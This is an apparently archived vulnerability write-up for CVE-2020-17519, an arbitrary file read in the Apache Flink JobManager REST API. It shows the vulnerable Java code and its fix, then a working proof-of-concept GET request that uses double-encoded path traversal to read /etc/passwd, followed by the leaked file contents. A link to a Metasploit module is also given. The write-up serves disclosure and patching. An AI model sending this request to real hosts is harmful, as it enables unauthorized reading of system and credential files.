关联漏洞
标题:
Apache Flink 安全漏洞
(CVE-2020-17519)
描述:Apache Flink是美国阿帕奇软件(Apache)基金会的一款开源的分布式流数据处理引擎。该产品主要使用Java和Scala语言编写。 Apache Flink 版本 1.11.0 至 版本1.11.2 存在安全漏洞,该漏洞允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
描述
[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read
介绍
<b>[CVE-2020-17519] Apache Flink RESTful API Arbitrary File Read</b>
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Apache Flink is a framework and distributed processing engine for stateful computations over unbounded and bounded data streams which developed using Java and Scala. A change introduced in Apache Flink 1.11.0 (and released in `1.11.1` and `1.11.2` as well) allows attackers to read any file on the local filesystem of the JobManager through the RESTful API of the JobManager process. Access to filesystem is restricted to files accessible by the JobManager process.
While all versions between `1.11.0 - 1.11.2` are affected the related vulnerability, Apache Flink has fixed vulnerability for versions `1.11.3` and above.
Vulnerable code is `src/main/java/org/apache/flink/runtime/rest/handler/cluster/JobManagerCustomLogHandler.java` class. Related code snippet is down below.
```java
if (logDir == null) {
return null;
}
String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
return new File(logDir, filename);
}
}
```
The problem is that the request handler enables to direct access to file path. With this [commit](https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801?branch=b561010b0ee741543c3953306037f00d7a9f0801&diff=split), vulnerable line of code has been changed as below. In the code snippet below, the vulnerable line is marked as comment line.
```java
if (logDir == null) {
return null;
}
// String filename = handlerRequest.getPathParameter(LogFileNamePathParameter.class);
String filename = new File(handlerRequest.getPathParameter(LogFileNamePathParameter.class)).getName();
return new File(logDir, filename);
}
}
```
<b>Proof of Concept (PoC):</b> In order to exploit this vulnerability, you can use the following request
```
GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
Host: vulnerablehost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
```
Response of the above request is down below
```
HTTP/1.1 200 OK
Content-Type: text/plain
content-length: 964
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
flink:x:9999:9999::/opt/flink:/bin/sh
```
<br>
Also, there is a metasploit module available for CVE-2020-17519 with Excellent ranking. You can find out ruby codes in [here](https://www.exploit-db.com/exploits/49398)
文件快照
[4.0K] /data/pocs/faac86a3b8355c5aa057627e4649072066ecae49
├── [292K] poc2.png
├── [284K] poc.png
└── [3.6K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。